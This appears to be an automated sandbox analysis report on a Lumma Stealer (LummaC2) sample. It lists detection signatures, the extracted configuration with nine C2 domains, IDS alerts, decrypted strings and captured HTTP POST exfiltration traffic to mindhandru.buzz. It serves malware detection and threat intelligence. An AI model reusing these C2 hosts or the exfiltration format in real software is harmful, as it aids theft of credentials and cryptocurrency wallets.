Edit tour

Windows Analysis Report
IERiUft8Wi.exe

Overview

General Information

Sample name:	IERiUft8Wi.exe renamed because original name is a hash value
Original sample name:	c317f66c3bb595d92533e3d0fe227366.exe
Analysis ID:	1581219
MD5:	c317f66c3bb595d92533e3d0fe227366
SHA1:	ff7cf48fd32a6e4b73b14568c7610d585e5b40d3
SHA256:	77e2dd1562a40f41cea1d27cd0bf045c762372807813718327a6cae72c46731e
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

IERiUft8Wi.exe (PID: 788 cmdline: "C:\Users\user\Desktop\IERiUft8Wi.exe" MD5: C317F66C3BB595D92533E3D0FE227366)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["scentniej.buzz", "hummskitnj.buzz", "appliacnesot.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: IERiUft8Wi.exe PID: 788	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: IERiUft8Wi.exe PID: 788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: IERiUft8Wi.exe PID: 788	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:46:28.446417+0100	2028371	3	Unknown Traffic	192.168.2.7	49699	104.21.11.101	443	TCP
2024-12-27T08:46:30.508950+0100	2028371	3	Unknown Traffic	192.168.2.7	49700	104.21.11.101	443	TCP
2024-12-27T08:46:32.913749+0100	2028371	3	Unknown Traffic	192.168.2.7	49702	104.21.11.101	443	TCP
2024-12-27T08:46:35.440185+0100	2028371	3	Unknown Traffic	192.168.2.7	49708	104.21.11.101	443	TCP
2024-12-27T08:46:37.713708+0100	2028371	3	Unknown Traffic	192.168.2.7	49714	104.21.11.101	443	TCP
2024-12-27T08:46:40.342640+0100	2028371	3	Unknown Traffic	192.168.2.7	49720	104.21.11.101	443	TCP
2024-12-27T08:46:43.828737+0100	2028371	3	Unknown Traffic	192.168.2.7	49727	104.21.11.101	443	TCP
2024-12-27T08:46:46.916525+0100	2028371	3	Unknown Traffic	192.168.2.7	49741	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:46:29.286052+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49699	104.21.11.101	443	TCP
2024-12-27T08:46:31.289089+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49700	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:46:29.286052+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49699	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:46:31.289089+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49700	104.21.11.101	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:46:34.055670+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49702	104.21.11.101	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: IERiUft8Wi.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://mindhandru.buzz/al	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apieed	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/_AP	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/te	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apiz	Avira URL Cloud: Label: malware

Found malware configuration

Source: IERiUft8Wi.exe.788.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "hummskitnj.buzz", "appliacnesot.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}

Multi AV Scanner detection for submitted file

Source: IERiUft8Wi.exe	Virustotal: Detection: 54%			Perma Link
Source: IERiUft8Wi.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: IERiUft8Wi.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: mindhandru.buzz
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp	String decryptor: PsFKDg--pablo

Source: IERiUft8Wi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49727 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49702 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.11.101:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz

Source: Joe Sandbox View

IP Address: 104.21.11.101 104.21.11.101

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49727 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49741 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49720 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 104.21.11.101:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KL0X99L81JFM9JAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12826Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VG1F1F6GT0R0NIELUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YCWJB536XGNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20359Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KZ3DWPSD5BMOKDKCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1227Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WQGMY49GD2RBDCWT6P0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583716Host: mindhandru.buzz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: mindhandru.buzz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz

Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498335415.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450584216.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1391638992.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
Source: IERiUft8Wi.exe, 00000000.00000003.1467459469.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467576272.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/_AP
Source: IERiUft8Wi.exe, 00000000.00000003.1467459469.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467576272.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/al
Source: IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369884000.000000000567B000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499314192.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450546338.000000000567C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369748162.0000000005680000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369595792.0000000005679000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369684966.0000000005679000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1370677126.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369846666.0000000005675000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1391638992.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369884000.000000000567B000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apieed
Source: IERiUft8Wi.exe, 00000000.00000002.1499489441.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apiz
Source: IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/pi
Source: IERiUft8Wi.exe, 00000000.00000003.1450284221.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/te
Source: IERiUft8Wi.exe, 00000000.00000003.1467644015.000000000567C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
